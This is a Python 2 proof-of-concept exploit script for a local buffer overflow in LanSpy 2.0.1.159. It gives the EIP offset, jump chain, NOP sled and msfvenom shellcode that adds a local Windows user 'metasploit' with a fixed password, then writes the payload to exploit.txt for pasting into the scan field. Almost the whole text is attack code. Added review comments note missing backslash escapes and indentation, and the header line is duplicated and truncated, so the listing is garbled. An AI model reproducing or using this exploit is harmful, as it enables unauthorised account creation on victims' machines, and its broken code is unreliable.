#!/usr/bin/python

#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: LanSpy 2.0.1.159 - L #!/usr/bin/python

#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: LanSpy 2.0.1.159 - Local Buffer Overflow RCE(PoC) #
# Date: 2018-12-16 #
# Author: Juan Prescotto #
# Tested Against: Win7 Pro SP1 64 bit #
# Software Download #1: https://www.exploit-db.com/apps/70a780b78ee7dbbbbc99852259f75d53-lanspy_setup_2.0.1.159.exe #
# Software Download #2: https://lizardsystems.com/download/lanspy_setup.exe #
# Version: 2.0.1.159 #
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine #
# Credit: Thanks to Gionathan "John" Reale (https://www.exploit-db.com/exploits/45968) for his work on the Denial of Service exploit #
# Steps : Open the APP > click on the scan field > paste in contents from the .txt file that was generated by this script #
#------------------------------------------------------------------------------------------------------------------------------------#
# Bad Characters: x00 thru x20 and x2cx2d #
# EIP Offset: 680 #
# Non-Participating Modules: lanspy.exe #
#------------------------------------------------------------------------------------------------------------------------------------#
# Run LanSpy with Administrative Rights; when the exploit.txt contents are pasted into the scan field and the scan is run, a Local User will be created: #
# User: Metasploit Password: MyPassword12 #
#------------------------------------------------------------------------------------------------------------------------------------#
# EIP overwrite --> JMP ECX --> Short Relative Reverse JMP --> Long Relative Reverse JMP --> NoPs --> Stack Adjustment --> Shellcode #
#------------------------------------------------------------------------------------------------------------------------------------#

#msfvenom -p windows/adduser USER=metasploit PASS=MyPassword12 --bad-chars x00x01x02x03x04x05x06x07x09x0ax0bx0cx0dx0fx10x11x12x13x14x1ax1bx1cx1dx1ex1fx2c --format python -v shellcode
#Payload size: 626 bytes

# Payload string as reported by the msfvenom command in the comment above (stated size: 626 bytes).
# NOTE(review): as transcribed on this page the literals read "x89xe5..." with no backslash
# escapes, i.e. plain ASCII text; every len() computed below is a count of that text.
shellcode = ""
shellcode += "x89xe5xdaxd1xd9x75xf4x5bx53x59x49x49"
shellcode += "x49x49x49x49x49x49x49x49x43x43x43x43"
shellcode += "x43x43x37x51x5ax6ax41x58x50x30x41x30"
shellcode += "x41x6bx41x41x51x32x41x42x32x42x42x30"
shellcode += "x42x42x41x42x58x50x38x41x42x75x4ax49"
shellcode += "x39x6cx39x78x6bx32x65x50x45x50x73x30"
shellcode += "x31x70x6dx59x58x65x36x51x4fx30x43x54"
shellcode += "x6cx4bx56x30x70x30x6ex6bx63x62x54x4c"
shellcode += "x4ex6bx66x32x65x44x6cx4bx54x32x47x58"
shellcode += "x76x6fx68x37x30x4ax31x36x75x61x69x6f"
shellcode += "x6ex4cx75x6cx35x31x43x4cx55x52x36x4c"
shellcode += "x45x70x4bx71x78x4fx76x6dx65x51x69x57"
shellcode += "x6dx32x4cx32x33x62x53x67x4cx4bx61x42"
shellcode += "x42x30x6cx4bx31x5ax47x4cx6ex6bx50x4c"
shellcode += "x52x31x54x38x6ax43x47x38x75x51x7ax71"
shellcode += "x46x31x4cx4bx36x39x35x70x47x71x38x53"
shellcode += "x4ex6bx43x79x67x68x39x73x35x6ax73x79"
shellcode += "x4ex6bx34x74x6cx4bx75x51x6ax76x35x61"
shellcode += "x4bx4fx4cx6cx7ax61x48x4fx64x4dx67x71"
shellcode += "x68x47x37x48x6bx50x32x55x39x66x33x33"
shellcode += "x53x4dx4ax58x37x4bx43x4dx65x74x52x55"
shellcode += "x38x64x73x68x6ex6bx46x38x75x74x73x31"
shellcode += "x78x53x72x46x6ex6bx54x4cx30x4bx6ex6b"
shellcode += "x63x68x75x4cx36x61x58x53x6ex6bx47x74"
shellcode += "x6cx4bx35x51x68x50x4bx39x50x44x46x44"
shellcode += "x54x64x61x4bx73x6bx53x51x56x39x43x6a"
shellcode += "x53x61x6bx4fx79x70x63x6fx53x6fx62x7a"
shellcode += "x4ex6bx54x52x5ax4bx4ex6dx61x4dx72x4a"
shellcode += "x46x61x6cx4dx4dx55x78x32x57x70x55x50"
shellcode += "x63x30x52x70x62x48x34x71x6cx4bx32x4f"
shellcode += "x4bx37x59x6fx4ex35x6dx6bx6cx30x78x35"
shellcode += "x6ex42x71x46x61x78x59x36x6dx45x4fx4d"
shellcode += "x6fx6dx79x6fx4ex35x57x4cx57x76x43x4c"
shellcode += "x57x7ax4dx50x4bx4bx4dx30x61x65x43x35"
shellcode += "x4dx6bx31x57x54x53x44x32x52x4fx33x5a"
shellcode += "x75x50x72x73x4bx4fx69x45x73x53x50x6d"
shellcode += "x62x44x54x6ex51x75x44x38x65x35x31x30"
shellcode += "x66x4fx35x33x31x30x42x4ex33x55x61x64"
shellcode += "x77x50x52x55x63x43x50x65x61x62x67x50"
shellcode += "x52x4dx51x75x54x34x73x51x61x63x70x70"
shellcode += "x50x6cx70x6fx63x59x64x34x55x70x50x4d"
shellcode += "x31x69x50x50x70x61x74x33x44x33x54x37"
shellcode += "x42x4fx34x32x73x54x34x71x54x72x67x50"
shellcode += "x54x6fx32x61x51x54x77x34x71x30x76x46"
shellcode += "x36x46x31x30x30x6ex51x75x31x64x55x70"
shellcode += "x70x6cx42x4fx70x63x70x61x70x6cx70x67"
shellcode += "x72x52x30x6fx72x55x44x30x35x70x51x51"
shellcode += "x73x54x42x4dx55x39x72x4ex50x69x71x63"
shellcode += "x32x54x34x32x31x71x70x74x50x6fx54x32"
shellcode += "x64x33x51x30x30x6dx35x35x64x34x70x61"
shellcode += "x70x73x32x50x32x4cx70x6fx45x39x71x64"
shellcode += "x77x50x56x4fx72x61x43x74x63x74x63x30"
shellcode += "x41x41"

# Size guard: the sled, the stack adjustment and the two jump stubs must all fit inside the
# 680-character offset stated in the header, so the payload string is capped at 633.
# NOTE(review): in this transcript the exit() line is not indented under the `if`; Python
# requires an indented block after the colon, so the listing as pasted would not parse.
if len(shellcode) > 633:
exit("[+] Shellcode is too big! Shellcode must be smaller than 633 bytes")

# "NoPs" stage from the header chain: eight repetitions of the "x90" text.
sled = "x90" * 8

#Necessary to allow shellcode room to operate
# "Stack Adjustment" stage from the header chain: ten copies of a three-character sequence.
stack_adjust = "x83xecx78" * 10

# "Long Relative Reverse JMP" stage from the header chain (five characters as transcribed).
reverse_jmp_long = "xe9x5cxfdxffxff"

# "Short Relative Reverse JMP" stage from the header chain, wrapped in two "x41" filler characters.
reverse_jmp_short = "x41xebxf6x41"

# Filler so that everything placed before `eip` totals exactly 680 characters (the EIP offset
# given in the header). A negative multiplier would silently yield "" rather than raise,
# presumably one reason the size guard above exists.
junk = "x41" * (680 - len(sled) - len(stack_adjust) - len(shellcode) - len(reverse_jmp_long) - len(reverse_jmp_short))

#004040AD JMP ECX (lanspy.exe)
# The three bytes of that address, least-significant first, appended last so they occupy the
# position the header calls the "EIP overwrite".
eip = "xadx40x40"

# Layout in memory order. Per the header's chain, control flow runs back-to-front through it:
# eip -> short jump -> long jump -> sled -> stack adjustment -> shellcode.
payload = sled + stack_adjust + shellcode + junk + reverse_jmp_long + reverse_jmp_short + eip
# Writes the payload to exploit.txt in the current working directory -- the on-disk artefact
# this script produces. Python 2 print statements; this does not run under Python 3.
# NOTE(review): the bare `except:` catches every exception (BaseException, including
# KeyboardInterrupt) and hides the real cause -- e.g. a permission error -- behind a generic
# message, and a failed write() skips f.close(). `with open("exploit.txt", "w") as f:` plus
# `except (IOError, OSError) as e:` would be the conventional form.
# NOTE(review): the try/except bodies are also unindented in this transcript (see above).
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"